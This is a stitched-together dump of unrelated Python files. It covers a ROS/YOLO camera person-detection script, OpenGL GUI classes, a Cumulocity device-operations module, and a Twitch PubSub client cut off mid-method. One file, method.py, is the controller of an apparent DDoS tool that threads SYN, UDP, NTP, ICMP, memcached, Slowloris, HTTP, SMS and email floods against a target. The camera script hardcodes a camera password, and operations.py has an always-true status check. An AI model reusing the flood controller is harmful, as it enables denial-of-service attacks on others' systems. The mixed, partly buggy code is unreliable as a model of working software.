# detect per 8 frame
# if frame_number % 8 == 1 or frame_number % 8 == 2 or frame_number % 8 == 3 or frame_number % 8 == 4 or frame_number % 8 == 5 or frame_number % 8 == 6 or frame_number % 8 == 7:
# return True
cfg.cuda()
use_cuda = 1
sized = cv2.resize(frame, (cfg.width, cfg.height))
sized = cv2.cvtColor(sized, cv2.COLOR_BGR2RGB)
r = do_detect(cfg, sized, 0.5, 0.4, use_cuda)
num_classes = 80
if num_classes == 20:
namesfile = 'data/voc.names'
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
class_names = load_class_names(namesfile)
res = []
for item in r:
if class_names[item[6]] == 'person':
res.append(item)
# get the max rectangle
result = []
change_idnum=len(pre_res.keys())==len(res)
for item in res:
result = item
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id, pre_res,change_idnum)
if id_name != 999:
dict_res[id_name] = [left, top, right, bottom, huojia1_id]
cv2.imshow('Cam2', cv2.resize(frame, (int(512 * wh_ratio), 512)))
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
return res, camera_id, dict_res
def main(camera_id, shelf_id):
rospy.init_node('MultiProcessingNode', anonymous=True)
ip = '192.168.0.' + str(camera_id)
name = str('admin')
pw = str('a1234567')
camera = HKCamera(ip, name, pw)
threadPubMsg_shelfID_1 = pubmsg.MsgPublishClass(cameraID=camera_id, shelfID=shelf_id[0])
threadPubMsg_shelfID_1.setDaemon(True)
threadPubMsg_shelfID_1.start()
shelf1 = 'shelfID_' + str(shelf_id[0])
threadPubMsg_dict = {shelf1: threadPubMsg_shelfID_1}
model = loadDataset()
cfg = Darknet('cfg/yolov3.cfg')
cfg.load_weights('yolov3.weights')
cfg.cuda()
# global frame_number
frame_number2 = [0]
flag = [0]
bridge = CvBridge()
dic_change = {}
pre_res = {}
huojia1_id = shelf_id[0]
print("huojia1_id: {}".format(huojia1_id))
tmp = 0
while not rospy.is_shutdown():
frame_origin = camera.getFrame()
frame_origin = np.array(frame_origin)
frame_origin = cv2.resize(frame_origin, None, fx=0.75, fy=0.75, interpolation=cv2.INTER_AREA)
frame_trans = copy.deepcopy(frame_origin)
# draw the shangping area
# left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
# cv2.rectangle(frame_origin, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
res, camera_id, dict_res = callback((None, cfg, model, frame_number2, bridge, camera_id, flag, frame_origin, huojia1_id, pre_res))
if res == []:
if tmp > 30:
threadPubMsg = threadPubMsg_dict['shelfID_' + str(huojia1_id)]
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id, person_id=-1,
shelf_id=huojia1_id, flag=0, flag1=0, flag2=0,
flag_list=[], frame=None)
tmp = 0
else:
tmp += 1
continue
else:
tmp = 0
dic = xuanze_original(res, frame_origin, model, cfg, camera_id, dic_change, huojia1_id,pre_res)
if compare_dic(dic, dic_change) == False:
pass
else:
dic = xuanze(res, frame_origin, model, cfg, threadPubMsg_dict, camera_id, dic, dic_change,
huojia1_id, frame_trans,pre_res)
#print("**********************")
#print("dic_change_shelf_{}: {}".format(shelf_id[0], dic))
#print("")
change_idnum = len(pre_res.keys()) == len(res)
if change_idnum:
pre_res = dict_res
else:
pre_res = {}
dic_change = dic
HKIPcamera.release()
if __name__ == '__main__':
#rospy.init_node('MultiProcessingNode', anonymous=True)
# manager = MyManager()
# manager.start()
#main(2, [1, 2])
# 开启多进程, 每个进程处理每个摄像�?
camera_ids = [3]
# shelf_ids = {3: [4], 5: [2]}
shelf_ids = {3: [4]}
# camera_ids = [6]
# shelf_ids = {6: [7]}
proces = []
for camera_id in camera_ids:
p = Process(target=main, args=(camera_id, shelf_ids[camera_id]))
proces.append(p)
p.start()
for p in proces:
p.join()
print("rospy.spin()")
rospy.spin()
|
glprogram.py
|
"""This module defines convenient classes for building 3D GUI programs.
- GLProgram takes care of basic user input.
- GLNavigationProgram allows 3D navigation with the mouse.
- GLRealtimeProgram calls a subclass-defined idle() function roughly on a
constant time step.
"""
from OpenGL.GL import *
from OpenGL.GLU import *
import camera
from ..math import so3,se3,vectorops
from ..robotsim import Viewport
import math
import time
class GLViewport:
"""
A class describing an OpenGL camera view.
Attributes:
x,y (int): upper left hand corner of the view in the OpenGL canvas, in screen pixels
w,h (int): width and height of the view, in screen pixels
screenDeviceScale (float): if not 1, multiply screen pixel coordinates by this to get
openGL pixel coordinates (usually Mac Retina displays)
orthogonal (bool): if true, does an orthogonal projection. (Not supported)
camera: an orbit camera (see :class:`orbit`)
fov (float): the camera field of view in x direction, in degrees
clippingplanes (pair of floats): a pair containing the near and far clipping planes
"""
def __init__(self):
self.orthogonal = False
self.x,self.y = 0,0
self.w,self.h = 640,480
self.screenDeviceScale = 1
self.camera = camera.orbit()
self.camera.dist = 6.0
#x field of view in degrees
self.fov = 30
#near and far clipping planes
self.clippingplanes = (0.2,20)
def contains(self,x,y):
return x >= self.x and y >= self.y and x < self.x + self.w and y < self.y + self.h
def setTransform(self,T,convention='standard'):
"""Sets the pose of the camera, with T given in world coordinates.
If convention = 'openGL', the Z axis of T is the *backward* direction of
the camera, with X pointing *up* and Y pointing to the *right*.
If convention = 'standard', the Z axis of T is the *forward* direction of
the camera, with X pointing *down* and Y pointing to the *right*
"""
if convention == 'openGL':
self.camera.set_matrix(T)
else:
xzflip = [-1,0,0, 0,1,0, 0,0,-1]
self.camera.set_matrix((so3.mul(T[0],xzflip),T[1]))
def getTransform(self,convention='standard'):
"""Gets the pose of the camera, with T given in world coordinates.
If convention = 'openGL', the Z axis of T is the *backward* direction of
the camera, with X pointing *up* and Y pointing to the *right*.
If convention = 'standard', the Z axis of T is the *forward* direction of
the camera, with X pointing *down* and Y pointing to the *right*
"""
if convention == 'openGL':
return self.camera.matrix()
else:
T = self.camera.matrix()
xzflip = [-1,0,0, 0,1,0, 0,0,-1]
return (so3.mul(T[0],xzflip),T[1])
def fit(self,center,radius):
"""Fits the viewport to an object filling a sphere of a certain center
and radius"""
self.camera.tgt = center
self.camera.dist = radius*2
zmin,zmax = self.clippingplanes
if radius < self.clippingplanes[0]:
zmin = radius*0.5
if radius*3 > self.clippingplanes[1]:
zmax =radius*3.5
self.clippingplanes = (zmin,zmax)
def toViewport(self):
"""Returns a Klampt C++ Viewport() instance corresponding to this view.
This is used to interface with the Widget classes"""
vp = Viewport()
vp.x,vp.y,vp.w,vp.h = self.x,self.y,self.w,self.h
vp.n,vp.f = self.clippingplanes
vp.perspective = True
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
vp.scale = 1.0/(2.0*math.tan(rfov*0.5/aspect)*aspect)
vp.setRigidTransform(*self.camera.matrix())
return vp
def click_ray(self,x,y):
"""Returns a pair of 3-tuples indicating the ray source and direction
in world coordinates for a screen-coordinate point (x,y)"""
R,t = self.camera.matrix()
#from x and y compute ray direction
u = float(x-(self.x + self.w/2))/self.w
v = float((self.y + self.h/2) -y)/self.w
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
d = (u*scale,v*scale,-1.0)
d = vectorops.div(d,vectorops.norm(d))
return (t,so3.apply(R,d))
def project(self,pt,clip=True):
"""Given a point in world space, returns the (x,y,z) coordinates of the projected
pixel. z is given in absolute coordinates, while x,y are given in pixel values.
If clip=True and the point is out of the viewing volume, then None is returned.
Otherwise, if the point is exactly at the focal plane then the middle of the viewport
is returned.
"""
ploc = se3.apply(se3.inv(self.camera.matrix()),pt)
if clip:
if -ploc[2] <= self.clippingplanes[0] or -ploc[2] >= self.clippingplanes[1]:
return None
if abs(ploc[2]) < 1e-8:
return (self.x+self.w/2,self.y+self.h/2)
#d = (u*scale,v*scale,-1.0)
#ploc.x = ploc.z*d.x
#ploc.y = ploc.z*d.y
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
u = -ploc[0]/(ploc[2]*scale)
v = -ploc[1]/(ploc[2]*scale)
if clip and (abs(u) > 0.5 or abs(v) > 0.5):
return None
x = u*self.w + (self.x + self.w/2)
y = (self.y + self.h/2) - v*self.w
return (x,y,-ploc[2])
def setCurrentGL(self):
"""Sets up the view in the current OpenGL context"""
# Projection
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
aspect = float(self.w)/float(self.h)
n,f = self.clippingplanes
if self.camera.dist*1.05 > f:
#allow super zoomed-out views to work without adjusting far plane
f = self.camera.dist*1.05
gluPerspective (self.fov/aspect,aspect,n,f)
# Initialize ModelView matrix
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
# View transformation
mat = se3.homogeneous(se3.inv(self.camera.matrix()))
cols = zip(*mat)
pack = sum((list(c) for c in cols),[])
glMultMatrixf(pack)
class GLProgramAction:
def __init__(self,hook,short_text,key,description=None):
self.hook = hook
self.short_text = short_text
self.key = key
self.description = description
if description == None:
self.description = short_text
class GLProgram:
"""A basic OpenGL visualization, run as part of some _GLBackend.
For the most part there is a one-to-one correspondence and the
backend just relays the input / drawing messages
Assumes that glinit.py has been imported to define _GLBackend.
Attributes:
name (str): title of the window (only has an effect before calling
run())
window: the QtBackend or GLUTBackend instance
view (GLViewport): describes the OpenGL viewport. If this is provided to an
empty _GLBackend window, the w,h gives a hint to the size of the window.
It is then updated by the user and setting the viewport size has no effect on the window.
clearColor (list of 4 floats): the RGBA floating point values of the background color.
actions (list of GLProgramAction): the list of actions. Must be populated using
add_action before init().
"""
def __init__(self,name="OpenGL Program"):
global _GLBackend
self.window = None
self.name = name
self.view = GLViewport()
self.clearColor = [1.0,1.0,1.0,0.0]
self.actions = []
def add_action(self,hook,short_text,key,description=None):
"""Defines a new generic GUI action. The action will be available in a menu in
Qt or as keyboard commands in GLUT."""
self.actions.append(GLProgramAction(hook,short_text,key,description))
def run(self):
"""Starts a new event loop with this object as the main program.
Note: might not return, in the case of GLUT.
"""
import visualization
visualization.setWindowTitle(self.name)
visualization.run(self)
def initialize(self):
"""Called after the GL context is initialized, but before main loop.
May be overridden. Users should not call this directly!"""
assert self.window != None
for a in self.actions:
self.window.add_action(a.hook,a.short_text,a.key,a.description)
return True
def refresh(self):
"""Call this to redraw the screen on the next event loop"""
self.window.refresh()
def modifiers(self):
"""Retrieves a list of currently pressed keyboard modifiers.
Values can be any combination of 'ctrl', 'shift', 'alt'.
"""
return self.window.modifiers()
def reshape(self,w,h):
"""Asks to resize the GL window"""
if self.window:
return self.window.reshape(w,h)
else:
self.view.w,self.view.h = w,h
def reshapefunc(self,w,h):
"""Called on window resize. May be overridden."""
self.view.w = w
self.view.h = h
self.refresh()
return True
def print_help(self):
#Put your help printouts here
print "************** Help **************"
print "?: print this help message"
for a in self.actions:
print a.key,":",a.description
print "**********************************"
def keyboardfunc(self,c,x,y):
"""Called on keypress down. May be overridden. c is either the ASCII/unicode
character of the key pressed or a string describing the character (up,down,left,right,
home,end,delete,enter,f1,...,f12)"""
if c == '?':
self.print_help()
return True
if 'alt' in self.modifiers():
c = 'Alt+'+c
if 'ctrl' in self.modifiers():
c = 'Ctrl+'+c
for a in self.actions:
if c == a.key:
a.hook()
self.refresh()
return True
return False
def keyboardupfunc(self,c,x,y):
"""Called on keyboard up (if your system allows it). May be overridden."""
return False
def motionfunc(self,x,y,dx,dy):
"""Called when the mouse moves on screen. May be overridden."""
return False
def mousefunc(self,button,state,x,y):
"""Called when the mouse is clicked. May be overridden."""
return False
def displayfunc(self):
"""All OpenGL calls go here. May be overridden, although you
may wish to override display() and display_screen() instead."""
if self.view.w == 0 or self.view.h == 0:
#hidden?
print "GLProgram.displayfunc called on hidden window?"
return False
self.prepare_GL()
self.display()
self.prepare_screen_GL()
self.display_screen()
return True
def idlefunc(self):
"""Called on idle. Default value stops all additional idle calls. Must be
overridden if you want to do something in the idle loop."""
#print "Sleeping idle from",self.__class__.__name__
self.idlesleep()
def idlesleep(self,duration=float('inf')):
"""Sleeps the idle callback for t seconds. If t is not provided,
the idle callback is slept forever"""
self.window.idlesleep(duration)
def prepare_GL(self):
"""Prepare drawing in world coordinate frame
"""
# Viewport
view = self.view
ydevice = (self.window.height - view.y - view.h)
glViewport(view.x*view.screenDeviceScale,ydevice*view.screenDeviceScale,view.w*view.screenDeviceScale,view.h*view.screenDeviceScale)
# Initialize
glClearColor(*self.clearColor)
glScissor(view.x*view.screenDeviceScale,ydevice*view.screenDeviceScale,view.w*view.screenDeviceScale,view.h*view.screenDeviceScale)
glEnable(GL_SCISSOR_TEST);
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
glEnable(GL_DEPTH_TEST)
glEnable(GL_LIGHTING)
glEnable(GL_NORMALIZE)
glShadeModel(GL_FLAT)
def prepare_screen_GL(self):
"""Prepare drawing on screen
"""
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0,self.view.w*self.view.screenDeviceScale,self.view.h*self.view.screenDeviceScale,0,-1,1);
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def display(self):
"""Do drawing of objects in world"""
return True
def display_screen(self):
"""Do drawing of objects on screen"""
return True
def closefunc(self):
"""Called by the window when it is closed"""
return True
def save_screen(self,fn,multithreaded=True):
"""Saves a screenshot"""
try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
print "Cannot save screens to disk, the Python Imaging Library is not installed"
return
if hasattr(self.window,'makeCurrent'):
self.window.makeCurrent()
glReadBuffer(GL_FRONT);
x,y,w,h = self.view.x*self.view.screenDeviceScale,self.view.y*self.view.screenDeviceScale,self.view.w*self.view.screenDeviceScale,self.view.h*self.view.screenDeviceScale
screenshot = glReadPixels( x, y, w, h, GL_RGBA, GL_UNSIGNED_BYTE)
im = Image.frombuffer("RGBA", (w, h), screenshot, "raw", "RGBA", 0, 0)
print "Saving screen to",fn
if not multithreaded:
im.save(fn)
else:
import threading
def func(im,fn):
im.save(fn)
th = threading.Thread(target=func,args=(im,fn))
th.start()
def draw_text(self,point,text,size=12,color=None):
self.window.draw_text(point,text,size,color)
class GLNavigationProgram(GLProgram):
"""A more advanced form of GLProgram that allows you to navigate a
camera around a 3D world. Click-drag rotates, Control-drag translates,
Shift-drag zooms.
"""
def __init__(self,name):
GLProgram.__init__(self,name)
#mouse state information
self.dragging = False
self.clearColor = [0.8,0.8,0.9,0]
def get_view(self):
"""Returns a GLViewport describing the viewport, which could be saved to
file."""
return self.view
def set_view(self,v):
"""Sets the viewport to a tuple previously returned by get_view(),
e.g. a prior view that was saved to file."""
self.view = v
self.reshape(self.view.w,self.view.h)
def prepare_GL(self):
GLProgram.prepare_GL(self)
self.view.setCurrentGL()
# Default light source
glLightfv(GL_LIGHT0,GL_POSITION,[0,-1,2,0])
glLightfv(GL_LIGHT0,GL_DIFFUSE,[1,1,1,1])
glLightfv(GL_LIGHT0,GL_SPECULAR,[1,1,1,1])
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1,GL_POSITION,[-1,2,1,0])
glLightfv(GL_LIGHT1,GL_DIFFUSE,[0.5,0.5,0.5,1])
glLightfv(GL_LIGHT1,GL_SPECULAR,[0.5,0.5,0.5,1])
glEnable(GL_LIGHT1)
def motionfunc(self,x,y,dx,dy):
if self.dragging:
if 'ctrl' in self.modifiers():
R,t = self.view.camera.matrix()
aspect = float(self.view.w)/self.view.h
rfov = self.view.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
delta = so3.apply(R,[-scale*float(dx)*self.view.camera.dist/self.view.w,scale*float(dy)*self.view.camera.dist/self.view.w,0])
self.view.camera.tgt = vectorops.add(self.view.camera.tgt,delta)
elif 'shift' in self.modifiers():
self.view.camera.dist *= math.exp(dy*0.01)
else:
self.view.camera.rot[2] -= float(dx)*0.01
self.view.camera.rot[1] -= float(dy)*0.01
self.refresh()
return True
return False
def mousefunc(self,button,state,x,y):
if button == 0:
if state == 0:
self.dragging = True
else:
self.dragging = False
return True
return False
class GLRealtimeProgram(GLNavigationProgram):
"""A GLNavigationProgram that refreshes the screen at a given frame rate.
Attributes:
ttotal (float): total elapsed time assuming a constant frame rate
fps (float): the frame rate in Hz
dt (float): 1.0/fps
counter (int): a frame counter
lasttime (float): time.time() value on the last frame.
"""
def __init__(self,name):
GLNavigationProgram.__init__(self,name)
self.ttotal = 0.0
self.fps = 50
self.dt = 1.0/self.fps
self.counter = 0
self.lasttime = time.time()
# idle callback
def idlefunc (self):
tcur = time.time()
tsleep = self.dt - (tcur - self.lasttime)
if tsleep > 0.001:
#print "Elapsed time",tcur-self.lasttime,"sleep",tsleep,"window",self.window.name
self.idlesleep(tsleep)
return
self.ttotal += self.dt
self.counter += 1
#call the user-defined idle function
self.idle()
self.lasttime = tcur
self.refresh()
return True
def idle(self):
"""Overload me"""
pass
class GLPluginProgram(GLRealtimeProgram):
"""This base class should be used with a GLPluginBase object to handle the
GUI functionality (see glcommon.py). Call setPlugin() on this object to set
the currently used plugin. pushPlugin()/popPlugin() can also be used to
set a hierarchy of plugins."""
def __init__(self,name="GLWidget"):
GLRealtimeProgram.__init__(self,name)
self.plugins = []
def setPlugin(self,plugin):
import copy
for p in self.plugins:
p.window = None
p.view = copy.copy(p.view)
self.plugins = []
if plugin:
self.pushPlugin(plugin)
def pushPlugin(self,plugin):
self.plugins.append(plugin)
plugin.window = self.window
if self.window:
if self.window.initialized:
print "GLPluginProgram.pushPlugin called after window was initialized, some actions may not be available"
plugin.view = self.view
plugin.reshapefunc(self.view.w,self.view.h)
self.refresh()
elif len(self.plugins) == 1 and hasattr(plugin,'view') and plugin.view != None:
self.view = plugin.view
else:
plugin.view = self.view
def popPlugin(self):
if len(self.plugins)==0: return None
res = self.plugins[-1]
self.plugins.pop(-1)
res.window = None
if self.window:
self.refresh()
return res
def set_view(self,v):
GLRealtimeProgram.set_view(self,v)
for p in self.plugins:
p.view = self.view
def initialize(self):
#print "GLPluginProgram initialize:",len(self.plugins),"plugins"
for plugin in self.plugins:
plugin.window = self.window
if not plugin.initialize():
print "GLPluginProgram.initialize(): Plugin of type",plugin.__class__.__name__,"Did not initialize"
return False
if hasattr(plugin,'actions'):
#print "Adding",len(plugin.actions),"actions for plugin",plugin.__class__.__name__
for a in plugin.actions:
self.add_action(*a)
return GLRealtimeProgram.initialize(self)
def idle(self):
anyhandled = False
for plugin in self.plugins:
if hasattr(plugin,'idle') and plugin.idle():
anyhandled = True
if not anyhandled:
return False
return True
def reshapefunc(self,w,h):
GLRealtimeProgram.reshapefunc(self,w,h)
for plugin in self.plugins:
plugin.reshapefunc(w,h)
return
def keyboardfunc(self,c,x,y):
for plugin in self.plugins[::-1]:
if plugin.keyboardfunc(c,x,y): return True
return GLRealtimeProgram.keyboardfunc(self,c,x,y)
def keyboardupfunc(self,c,x,y):
for plugin in self.plugins[::-1]:
if plugin.keyboardupfunc(c,x,y): return True
return GLRealtimeProgram.keyboardupfunc(self,c,x,y)
def motionfunc(self,x,y,dx,dy):
for plugin in self.plugins[::-1]:
if plugin.motionfunc(x,y,dx,dy): return True
return GLRealtimeProgram.motionfunc(self,x,y,dx,dy)
def mousefunc(self,button,state,x,y):
for plugin in self.plugins[::-1]:
if plugin.mousefunc(button,state,x,y): return True
return GLRealtimeProgram.mousefunc(self,button,state,x,y)
def displayfunc(self):
for plugin in self.plugins[::-1]:
if plugin.displayfunc():
break
GLRealtimeProgram.displayfunc(self)
def display(self):
for plugin in self.plugins:
if plugin.display(): return True
return GLRealtimeProgram.display(self)
def display_screen(self):
for plugin in self.plugins:
if plugin.display_screen(): return True
return GLRealtimeProgram.display_screen(self)
|
method.py
|
from time import time, sleep
from threading import Thread
from colorama import Fore
from humanfriendly import format_timespan, Spinner
from tools.crash import CriticalError
from tools.ipTools import GetTargetAddress, InternetConnectionCheck
""" Find & import ddos method """
def GetMethodByName(method):
if method == "SMS":
dir = "tools.SMS.main"
elif method == "EMAIL":
dir = "tools.EMAIL.main"
elif method in ("SYN", "UDP", "NTP", "POD", "ICMP", "MEMCACHED"):
dir = f"tools.L4.{method.lower()}"
elif method in ("HTTP", "SLOWLORIS"):
dir = f"tools.L7.{method.lower()}"
else:
raise SystemExit(
f"{Fore.RED}[!] {Fore.MAGENTA}Unknown ddos method {repr(method)} selected..{Fore.RESET}"
)
module = __import__(dir, fromlist=["object"])
if hasattr(module, "flood"):
method = getattr(module, "flood")
return method
else:
CriticalError(
f"Method 'flood' not found in {repr(dir)}. Please use python 3", "-"
)
""" Class to control attack methods """
class AttackMethod:
# Constructor
def __init__(self, name, duration, threads, target):
self.name = name
self.duration = duration
self.threads_count = threads
self.target_name = target
self.target = target
self.threads = []
self.is_running = False
# Enter
def __enter__(self):
InternetConnectionCheck()
self.method = GetMethodByName(self.name)
self.target = GetTargetAddress(self.target_name, self.name)
return self
# Exit
def __exit__(self, exc_type, exc_val, exc_tb):
print(f"{Fore.MAGENTA}[!] {Fore.BLUE}Attack completed!{Fore.RESET}")
# Run time checker
def __RunTimer(self):
__stopTime = time() + self.duration
while time() < __stopTime:
if not self.is_running:
return
sleep(1)
self.is_running = False
# Run flooder
def __RunFlood(self):
while self.is_running:
self.method(self.target)
# Start threads
def __RunThreads(self):
# Run timer thread
thread = Thread(target=self.__RunTimer)
thread.start()
# Check if 1 thread
if self.name == "EMAIL":
self.threads_count = 1
# Create flood threads
for _ in range(self.threads_count):
thread = Thread(target=self.__RunFlood)
self.threads.append(thread)
# Start flood threads
with Spinner(
label=f"{Fore.YELLOW}Starting {self.threads_count} threads{Fore.RESET}",
total=100,
) as spinner:
for index, thread in enumerate(self.threads):
thread.start()
spinner.step(100 / len(self.threads) * (index + 1))
# Wait flood threads for stop
for index, thread in enumerate(self.threads):
thread.join()
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}Stopped thread {index + 1}.{Fore.RESET}"
)
# Start ddos attack
def Start(self):
if self.name == "EMAIL":
target = self.target_name
else:
target = str(self.target).strip("()").replace(", ", ":").replace("'", "")
duration = format_timespan(self.duration)
print(
f"{Fore.MAGENTA}[?] {Fore.BLUE}Starting attack to {target} using method {self.name}.{Fore.RESET}\n"
f"{Fore.MAGENTA}[?] {Fore.BLUE}Attack will be stopped after {Fore.MAGENTA}{duration}{Fore.BLUE}.{Fore.RESET}"
)
self.is_running = True
try:
self.__RunThreads()
except KeyboardInterrupt:
self.is_running = False
print(
f"\n{Fore.RED}[!] {Fore.MAGENTA}Ctrl+C Detected. Stopping {self.threads_count} threads..{Fore.RESET}"
)
# Wait all threads for stop
for thread in self.threads:
thread.join()
except Exception as err:
print(err)
|
operations.py
|
import requests
import logging
import json
import API.authentication as auth
import deviceControl.operationsHandler
import threading
logger = logging.getLogger('Operations API')
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger.info('Logger for operations was initialised')
def setOperationMode(operationID, status, text = ''):
try:
mode = status
url = "https://%s/devicecontrol/operations/%s"%(auth.get().tenant, operationID)
if mode == 'EXECUTING' or 'SUCCESSFUL' or 'FAILED':
logger.info('Operation ' + str(mode))
data = {}
data['status'] = str(status)
if mode == 'FAILED':
data['failureReason'] = str(text)
response = requests.request("PUT", url, headers=auth.get().headers, data = json.dumps(data))
else:
logger.error('Mode not known')
return False
logger.info('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Operation successfully set to Executing')
return True
else:
logger.error('Operation not successfully set to Executing')
return False
except Exception as e:
logger.error('The following error occured: %s' % (str(e)))
def getPendingOperations(internalID):
try:
url = "https://%s/devicecontrol/operations?status=PENDING&deviceId=%s"%(auth.get().tenant, internalID)
response = requests.request("GET", url, headers=auth.get().headers, data = auth.get().payload)
logger.info('Response from request: ' + str(response.text))
logger.info('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Valid request')
json_data = json.loads(response.text)
logger.debug('Json response: %s'%(str(json_data)))
logger.info('Checking if operations is not empty')
if not json_data['operations']:
logger.debug('Operations is empty, returns False')
return False
logger.info('Operation is not empty')
logger.debug('Looping through operations')
for operation in json_data['operations']:
logger.debug('Current item: %s'%(str(operation)))
operationsHandlerThread = threading.Thread(target=deviceControl.operationsHandler.start, kwargs=dict(internalID=auth.get().internalID,operation=operation ), daemon=True)
operationsHandlerThread.start()
else:
logger.warning('Got response with status_code: ' + str(response.status_code))
return False
except Exception as e:
logger.error('The following error occured: %s'% (str(e)))
|
pubsub.py
|
# Copyright (c) 2020. Lena "Teekeks" During <info@teawork.de>
"""
PubSub client
-------------
This is a full implementation of the PubSub API of twitch.
PubSub enables you to subscribe to a topic, for updates (e.g., when a user cheers in a channel).
Read more about it on `the Twitch API Documentation <https://dev.twitch.tv/docs/pubsub>`__.
.. note:: You **always** need User Authentication while using this!
*******************
Short code example:
*******************
.. code-block:: python
from twitchAPI.pubsub import PubSub
from twitchAPI.twitch import Twitch
from twitchAPI.types import AuthScope
from pprint import pprint
from uuid import UUID
def callback_whisper(uuid: UUID, data: dict) -> None:
print('got callback for UUID ' + str(uuid))
pprint(data)
# setting up Authentication and getting your user id
twitch = Twitch('my_app_id', 'my_app_secret')
twitch.authenticate_app([])
# you can get your user auth token and user auth refresh token following the example in twitchAPI.oauth
twitch.set_user_authentication('my_user_auth_token', [AuthScope.WHISPERS_READ], 'my_user_auth_refresh_token')
user_id = twitch.get_users(logins=['my_username'])['data'][0]['id']
# starting up PubSub
pubsub = PubSub(twitch)
pubsub.start()
# you can either start listening before or after you started pubsub.
uuid = pubsub.listen_whispers(user_id, callback_whisper)
input('press ENTER to close...')
# you do not need to unlisten to topics before stopping but you can listen and unlisten at any moment you want
pubsub.unlisten(uuid)
pubsub.stop()
********************
Class Documentation:
********************
"""
from .twitch import Twitch
from .types import *
from .helper import get_uuid, make_enum, TWITCH_PUB_SUB_URL
import asyncio
import websockets
import threading
import json
from random import randrange
import datetime
from logging import getLogger, Logger
from typing import Callable, List, Dict
from uuid import UUID
from time import sleep
class PubSub:
"""The PubSub client
:var int ping_frequency: with which frequency in seconds a ping command is send.
You probably don't want to change this.
This should never be shorter than 12 + `ping_jitter` seconds to avoid problems
with the pong timeout.
|default| :code:`120`
:var int ping_jitter: time in seconds added or subtracted from `ping_frequency`.
You probably don't want to change this.
|default| :code:`4`
:var int listen_confirm_timeout: maximum time in seconds waited for a listen confirm.
|default| :code:`30`
"""
ping_frequency: int = 120
ping_jitter: int = 4
listen_confirm_timeout: int = 30
reconnect_delay_steps: List[int] = [1, 2, 4, 8, 16, 32, 64, 128]
__twitch: Twitch = None
__connection = None
__socket_thread: threading.Thread = None
__running: bool = False
__socket_loop = None
__topics: dict = {}
__startup_complete: bool = False
__tasks = None
__waiting_for_pong: bool = False
__logger: Logger = None
__nonce_waiting_confirm: dict = {}
def __init__(self, twitch: Twitch):
self.__twitch = twitch
self.__logger = getLogger('twitchAPI.pubsub')
def start(self) -> None:
"""
Start the PubSub Client
:raises RuntimeError: if already started
"""
if self.__running:
raise RuntimeError('already started')
self.__startup_complete = False
self.__socket_thread = threading.Thread(target=self.__run_socket)
self.__running = True
self.__socket_thread.start()
while not self.__startup_complete:
sleep(0.01)
def stop(self) -> None:
"""
Stop the PubSub Client
:raises RuntimeError: if the client is not running
"""
if not self.__running:
raise RuntimeError('not running')
self.__startup_complete = False
self.__running = False
for task in self.__tasks:
task.cancel()
self.__socket_loop.call_soon_threadsafe(self.__socket_loop.stop)
self.__socket_thread.join()
###########################################################################################
# Internal
###########################################################################################
async def __connect(self, is_startup=False):
if self.__connection is not None and self.__connection.open:
await self.__connection.close()
retry = 0
need_retry = True
while need_retry and retry < len(self.reconnect_delay_steps):
need_retry = False
try:
self.__connection = await websockets.connect(TWITCH_PUB_SUB_URL, loop=self.__socket_loop)
except websockets.InvalidHandshake:
self.__logger.warning(f'connection attempt failed, retry in {self.reconnect_delay_steps[retry]}s...')
await asyncio.sleep(self.reconnect_delay_steps[retry])
retry += 1
need_retry = True
if retry >= len(self.reconnect_delay_steps):
raise TwitchBackendException('cant connect')
if self.__connection.open and not is_startup:
uuid = str(get_uuid())
await self.__send_listen(uuid, list(self.__topics.keys()))
async def __send_listen(self, nonce: str, topics: List[str], subscribe: bool = True):
listen_msg = {
'type': 'LISTEN' if subscribe else 'UNLISTEN',
'nonce': nonce,
'data': {
'topics': topics,
'auth_token': self.__twitch.get_user_auth_token()
}
}
self.__nonce_waiting_confirm[nonce] = {'received': False,
'error': PubSubResponseError.NONE}
timeout = datetime.datetime.utcnow() + datetime.timedelta(seconds=self.listen_confirm_timeout)
confirmed = False
self.__logger.debug(f'sending {"" if subscribe else "un"}listen for topics {str(topics)} with nonce {nonce}')
await self.__send_message(listen_msg)
# wait for confirm
while not confirmed and datetime.datetime.utcnow() < timeout:
await asyncio.sleep(0.01)
confirmed = self.__nonce_waiting_confirm[nonce]['received']
if not confirmed:
raise PubSubListenTimeoutException()
else:
error = self.__nonce_waiting_confirm[nonce]['error']
if error is not PubSubResponseError.NONE:
if error is PubSubResponseError.BAD_AUTH:
raise TwitchAuthorizationException()
if error is PubSubResponseError.SERVER:
raise TwitchBackendException()
raise TwitchAPIException(error)
async def __send_message(self, msg_data):
await self.__connection.send(json.dumps(msg_data))
def __run_socket(self):
self.__socket_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.__socket_loop)
# startup
self.__socket_loop.run_until_complete(self.__connect(is_startup=True))
self.__tasks = [
asyncio.ensure_future(self.__task_heartbeat(), loop=self.__socket_loop),
asyncio.ensure_future(self.__task_receive(), loop=self.__socket_loop),
asyncio.ensure_future(self.__task_initial_listen(), loop=self.__socket_loop)
]
try:
self.__socket_loop.run_forever()
except asyncio.CancelledError:
pass
if self.__connection.open:
